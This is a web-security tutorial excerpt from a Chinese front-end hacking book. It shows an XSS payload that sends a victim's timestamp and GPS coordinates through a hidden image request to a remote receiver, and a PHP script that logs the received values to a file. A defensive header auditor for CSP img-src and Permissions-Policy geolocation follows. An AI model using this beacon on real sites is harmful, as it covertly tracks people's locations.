Stealing geolocation via XSS
Injected XSS code:
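<script>
// Local timestamp followed by the Chinese weekday name ('星期' + one of '日一二三四五六').
var today = new Date().toLocaleString() + '星期' + '日一二三四五六'.charAt(new Date().getDay());
// The rest of the receiver URL is truncated in the source; test.php below reads the value from its "txt" query parameter.
// `position` is the Geolocation API result object; the code that obtains it is not part of this excerpt.
document.getElementById('remote').src = "http://…" + today + "----" + encodeURIComponent(position.coords.latitude) + "," + encodeURIComponent(position.coords.longitude);
</script>
<img id="remote" src="" width=0 height=0>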
test.php code:
<?php
// Append the value of the "txt" query parameter to file.txt, one record per line.
$fh = fopen("file.txt", 'a+');
fwrite($fh, $_GET["txt"]);
fwrite($fh, "\r\n");
fclose($fh);
?>
Excerpted from 《web前端黑客技术揭秘》
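The payload above depends on two things: the page being allowed to use geolocation, and an <img> request to a foreign host. The following is an added example, not code from the book: a small auditor that checks a response's headers for the two controls that cut those off (a CSP image source restriction and Permissions-Policy geolocation=()). The function names and sample header values are constructed for illustration, and the CSP check only flags fully open sources (*, http:, https:), not over-broad host allowlists.

```javascript
// Added example. Header values are constructed samples, not taken from a real site.

// Parse a Content-Security-Policy value into { directive: [sources] }.
// Per the CSP spec, only the first occurrence of a directive counts.
function parseCsp(value) {
  const out = {};
  for (const part of (value || '').split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name && !(name.toLowerCase() in out)) out[name.toLowerCase()] = sources;
  }
  return out;
}

// True when img-src (or its default-src fallback) lets <img> load from any host,
// which is what the zero-size image beacon relies on.
function imgBeaconAllowed(cspValue) {
  const csp = parseCsp(cspValue);
  const sources = csp['img-src'] || csp['default-src'];
  if (!sources) return true; // no governing directive: images load from anywhere
  return sources.some(s => ['*', 'http:', 'https:'].includes(s.toLowerCase()));
}

// True when Permissions-Policy carries geolocation=() (empty allowlist).
function geolocationDisabled(ppValue) {
  let allowlist = null; // the last geolocation entry wins
  for (const item of (ppValue || '').split(',')) {
    const eq = item.indexOf('=');
    if (eq > 0 && item.slice(0, eq).trim().toLowerCase() === 'geolocation')
      allowlist = item.slice(eq + 1).trim();
  }
  return allowlist === '()';
}

// Report which of the two controls are missing from a lower-cased header map.
function auditHeaders(headers) {
  const findings = [];
  if (imgBeaconAllowed(headers['content-security-policy']))
    findings.push('img-src permits image requests to arbitrary hosts');
  if (!geolocationDisabled(headers['permissions-policy']))
    findings.push('geolocation is not disabled by Permissions-Policy');
  return findings;
}

const WEAK = { 'content-security-policy': "default-src 'self'; img-src *" };
const HARDENED = {
  'content-security-policy': "default-src 'self'; img-src 'self'",
  'permissions-policy': 'geolocation=(), camera=()',
};
console.log(auditHeaders(WEAK), auditHeaders(HARDENED));
```

Disabling geolocation this way only suits sites that do not use the feature themselves; the injection point still has to be fixed with output encoding.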